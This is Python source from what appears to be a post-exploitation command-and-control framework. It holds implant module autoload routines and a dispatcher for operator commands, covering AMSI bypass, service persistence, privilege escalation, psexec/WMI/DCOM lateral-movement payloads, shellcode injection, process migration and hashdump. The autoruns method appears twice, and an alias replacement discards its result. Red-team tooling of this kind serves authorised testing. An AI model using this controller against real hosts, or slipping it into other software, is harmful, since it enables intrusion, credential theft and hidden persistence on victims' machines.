def autoruns(self):
if "C#" in self.Pivot:
new_task("loadmodule Stage2-Core.exe", "autoruns", self.RandomURI)
new_task("loadmodule PwrStatusTracker.dll", "autoruns",
self.RandomURI)
update_mods("Stage2-Core.exe", self.RandomURI)
update_mods("PwrStatusTracker.dll", self.RandomURI)
new_task("loadpowerstatus", "autoruns", self.RandomURI)
update_label("PSM", self.RandomURI)
if "PS" in self.Pivot:
new_task("loadmodule Stage2-Core.ps1", "autoruns", self.RandomURI)
update_mods("Stage2-Core.ps1", self.RandomURI)
if "PBind Pivot" in self.Pivot:
update_label("Parent: %s" % self.IPAddress, self.RandomURI)
#new_task("pbind-pivot-loadmodule Stage2-Core.exe", "autoruns", self.IPAddress)
update_mods("Stage2-Core.exe", self.RandomURI)
elif "PB" in self.Pivot:
update_label("Parent: %s" % self.IPAddress, self.RandomURI)
#new_task("pbind-loadmodule Stage2-Core.exe", "autoruns", self.IPAddress)
update_mods("Stage2-Core.exe", self.RandomURI)
if "FC" in self.Pivot:
update_label("Parent: %s" % self.IPAddress, self.RandomURI)
new_task("fcomm-loadmodule Stage2-Core.exe", "autoruns",
self.RandomURI)
update_mods("Stage2-Core.exe", self.RandomURI)
result = get_autoruns()
if result:
for autorun in result:
run_autoloads(autorun[1], self.RandomURI, "autoruns")
new_task(autorun[1], "autoruns", self.RandomURI)
def autoruns(self):
if "C#" in self.Pivot:
new_task("loadmodule Stage2-Core.exe", "autoruns", self.RandomURI)
update_mods("Stage2-Core.exe", self.RandomURI)
if "PS" in self.Pivot:
new_task("loadmodule Stage2-Core.ps1", "autoruns", self.RandomURI)
update_mods("Stage2-Core.ps1", self.RandomURI)
result = get_autoruns()
if result:
for autorun in result:
run_autoloads(autorun[1], self.RandomURI, "autoruns")
new_task(autorun[1], "autoruns", self.RandomURI)
def handle_ps_command(command, user, randomuri, implant_id):
try:
check_module_loaded("Stage2-Core.ps1", randomuri, user)
except Exception as e:
print_bad("Error loading Stage2-Core.ps1: %s" % e)
# alias mapping
for alias in ps_alias:
if command.startswith(alias[0]):
command.replace(alias[0], alias[1])
command = command.strip()
run_autoloads(command, randomuri, user)
# opsec failures
for opsec in ps_opsec:
if opsec == command[:len(opsec)]:
print_bad("**OPSEC Warning**")
ri = input("Do you want to continue running - %s? (y/N) " %
command)
if ri.lower() == "n":
command = ""
if ri == "":
command = ""
break
if command.startswith("unhook-amsi"):
do_unhook_amsi(user, command, randomuri)
return
elif command.startswith("searchhelp"):
do_searchhelp(user, command, randomuri)
return
elif command.startswith("download-files "):
do_download_files(user, command, randomuri)
return
elif command.startswith("install-servicelevel-persistencewithproxy"):
do_install_servicelevel_persistencewithproxy(user, command, randomuri)
return
elif command.startswith("install-servicelevel-persistence"):
do_install_servicelevel_persistencewithproxy(user, command, randomuri)
return
elif command.startswith("remove-servicelevel-persistence"):
do_remove_servicelevel_persistence(user, command, randomuri)
return
elif command.startswith("get-implantworkingdirectory"):
do_get_implantworkingdirectory(user, command, randomuri)
return
elif command.startswith("get-system-withproxy"):
do_get_system_withproxy(user, command, randomuri)
return
elif command.startswith("get-system-withdaisy"):
do_get_system_withdaisy(user, command, randomuri)
return
elif command.startswith("get-system"):
do_get_system(user, command, randomuri)
return
elif command.startswith("invoke-psexec ") or command.startswith(
"invoke-smbexec "):
do_invoke_psexec(user, command, randomuri)
return
elif command.startswith("invoke-psexecproxypayload "):
do_invoke_psexecproxypayload(user, command, randomuri)
return
elif command.startswith("invoke-psexecdaisypayload "):
do_invoke_psexecdaisypayload(user, command, randomuri)
return
elif command.startswith("invoke-psexecpayload "):
do_invoke_psexecpayload(user, command, randomuri)
return
elif command.startswith("invoke-wmiexec "):
do_invoke_wmiexec(user, command, randomuri)
return
elif command.startswith("invoke-wmijspbindpayload "):
do_invoke_wmijsbindpayload(user, command, randomuri)
return
elif command.startswith("invoke-wmijsproxypayload "):
do_invoke_wmijsproxypayload(user, command, randomuri)
return
elif command.startswith("invoke-wmijsdaisypayload "):
do_invoke_wmijsdaisypayload(user, command, randomuri)
return
elif command.startswith("invoke-wmijspayload "):
do_invoke_wmijspayload(user, command, randomuri)
return
elif command.startswith("invoke-wmiproxypayload "):
do_invoke_wmiproxypayload(user, command, randomuri)
return
elif command.startswith("invoke-wmidaisypayload "):
do_invoke_wmidaisypayload(user, command, randomuri)
return
elif command.startswith("invoke-wmipayload "):
do_invoke_wmipayload(user, command, randomuri)
return
elif command.startswith("invoke-dcomproxypayload "):
do_invoke_dcomproxypayload(user, command, randomuri)
return
elif command.startswith("invoke-dcomdaisypayload "):
do_invoke_dcomdaisypayload(user, command, randomuri)
return
elif command.startswith("invoke-dcompayload "):
do_invoke_dcompayload(user, command, randomuri)
return
elif command.startswith("invoke-runas "):
do_invoke_runas(user, command, randomuri)
return
elif command.startswith("invoke-runasdaisypayload"):
do_invoke_runasdaisypayload(user, command, randomuri)
return
elif command.startswith("invoke-runasproxypayload"):
do_invoke_runasproxypayload(user, command, randomuri)
return
elif command.startswith("invoke-runaspayload"):
do_invoke_runaspayload(user, command, randomuri)
return
elif command == "help":
do_help(user, command, randomuri)
return
elif command.startswith("get-pid"):
do_get_pid(user, command, randomuri)
return
elif command.startswith("upload-file"):
do_upload_file(user, command, randomuri)
return
elif command == "kill-implant" or command == "exit":
do_kill_implant(user, command, randomuri)
return
elif command.startswith("migrate"):
do_migrate(user, command, randomuri)
return
elif command.startswith("loadmoduleforce"):
do_loadmoudleforce(user, command, randomuri)
return
elif command.startswith("loadmodule"):
do_loadmodule(user, command, randomuri)
return
elif command.startswith("pbind-loadmodule"):
do_pbind_loadmodule(user, command, randomuri)
return
elif command.startswith("invoke-daisychain"):
do_invoke_daisychain(user, command, randomuri)
return
elif command.startswith("inject-shellcode"):
do_inject_shellcode(user, command, randomuri)
return
elif command == "listmodules":
do_listmodules(user, command, randomuri)
return
elif command == "modulesloaded":
do_modulesloaded(user, command, randomuri)
return
elif command == "ps":
do_ps(user, command, randomuri)
return
elif command == "hashdump":
do_hashdump(user, command, randomuri)
return
elif command == "stopdaisy":
do_stopdaisy(user, command, randomuri)
return
elif command == "stopsocks":
do_stopsocks(user, command, randomuri)
return
elif command == "sharpsocks":
do_sharpsocks(user, command, randomuri)
return
elif command.startswith("reversedns"):
do_reversedns(user, command, randomuri)
return
else:
if command:
do_shell(user, command, randomuri)
return
